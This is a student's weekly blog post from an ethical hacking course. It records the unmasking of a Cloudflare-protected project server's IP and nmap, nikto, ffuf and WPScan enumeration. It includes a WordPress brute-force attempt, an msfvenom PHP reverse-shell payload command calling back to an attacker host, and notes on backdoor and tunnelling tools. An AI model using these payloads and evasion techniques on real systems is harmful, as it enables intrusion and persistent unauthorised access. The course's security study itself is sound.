Week 11

This week, our team made initial progress in the final penetration testing project by successfully uncovering the real IP address of the target server, server1.pentest.id, which was originally hidden behind Cloudflare.

 Real IP Discovery

  • Identified IP: 103.127.137.243

  • Method: We used Censys, a search engine for internet-connected assets. By digging through historical DNS records and SSL/TLS certificate data, we were able to trace the origin IP — a reminder that even reverse proxies like Cloudflare can be bypassed with the right tools and research.

Scanning & Enumeration Tools

Once we had the real IP, we began actively scanning the server to find potential vulnerabilities:

1. Nmap

Used for port and service discovery:

nmap -sV -Pn 103.127.137.243

This scan revealed multiple open services (e.g., web, FTP, SSH) that could be potential entry points.

2. Nikto

Scanned the web server for outdated software and known issues:

nikto -h http://103.127.137.243

3. FFUF (Fuzz Faster U Fool)

Performed directory brute-forcing to uncover hidden paths:

ffuf -u http://103.127.137.243/FUZZ -w /usr/share/wordlists/dirb/common.txt

This helped us identify unlisted admin pages and other sensitive endpoints.

4. WPScan

We discovered the server was running WordPress and used WPScan to:

  • Check for vulnerable plugins/themes

  • Enumerate users

  • Attempt brute-force login using rockyou.txt (unsuccessful)

Lecture Recap: Maintaining Access After Exploitation

While we worked on scanning, the lecture focused on persistence techniques — how attackers maintain access after compromising a system.

Backdoor Tools:

  • Cymothoa – Injects shellcode into running processes

  • Meterpreter – A stealthy, post-exploitation tool from Metasploit

  • Weevely & Webacoo – PHP web backdoors disguised as normal files

Web-Based Persistence:

We practiced generating reverse shells with msfvenom:

msfvenom -p php/meterpreter/reverse_tcp LHOST=[your IP] -f raw > shell.php

Uploading shell.php and opening it in a browser creates a reverse Meterpreter session back to the attacker.

Tunneling Techniques:

Used to evade firewalls and proxies:

  • proxychains

  • ptunnel, socat

  • iodine, dns2tcp (for DNS tunneling)

These methods disguise malicious traffic within trusted protocols like DNS or HTTPS, making it harder to detect.

Comments

Post a Comment

Popular posts from this blog

Final Reflection

Image
Week 13 was dedicated to presenting our final project. Each team delivered a short presentation summarizing their ethical hacking engagement, from reconnaissance to exploitation based on their submitted report. Final Thoughts & Reflection When I first enrolled in this course, I saw ethical hacking as just another requirement in my academic program, something to get through. But over the weeks, especially after the hands-on labs and final penetration test, my view changed completely. This course turned out to be one of the most engaging and eye-opening parts of my study so far. Learning how systems can be tested, broken, and hardened was fascinating. It taught me not only technical skills, but also how attackers think, and how defenders must think smarter. Now, cybersecurity is something I’m seriously considering for my future career. It’s exciting, fast-paced, and more impactful than I expected. Honestly, it made choosing a career path even harder, in a good way.
Read more

Week 10

Week 10 marked the start of our final project , where we’ll apply everything we’ve learned so far in a real-world penetration testing scenario. The goal is to simulate a complete ethical hacking engagement over the course of four weeks. Project Overview Target: server1.pentest.id Start Date: May 10, 10:00 AM Challenge: The target is protected by Cloudflare , which masks its real IP address using a reverse proxy. Project Tasks Identify the real IP hidden behind Cloudflare. Exploit vulnerabilities using known or custom techniques. Gain root access through privilege escalation. Document the entire process through: A 10-minute executive presentation A detailed technical report (DOCX) Important rules: No DoS/DDoS attacks You may clear logs and plant backdoors System configurations must not be altered or patched Lecture Recap: Vulnerability Research & Exploitation In addition to launching the project, this week’s lecture revisited t...
Read more

Week 8

The weakest link in an organization chain are humans. Some of the most damaging and well-known cyber attacks are not caused due to weak technology or a crack in the code, instead, humans. This week, we explored the most powerful and common forms of attack: social engineering . Rather than targeting software or hardware, these attacks focus on exploiting human behavior to gain unauthorized access or information.  Social Engineering Attack Process We broke down the social engineering attack lifecycle into four main phases: Intelligence Gathering – Researching the target through social media, company websites, or public records. Identifying Vulnerabilities – Pinpointing weak spots in communication channels or personal behaviors. Planning the Attack – Choosing a method, setting a goal, and crafting the approach. Execution – Carrying out the deception, such as sending a phishing email or impersonating an employee. Common Attack Techniques We studied psychological ...
Read more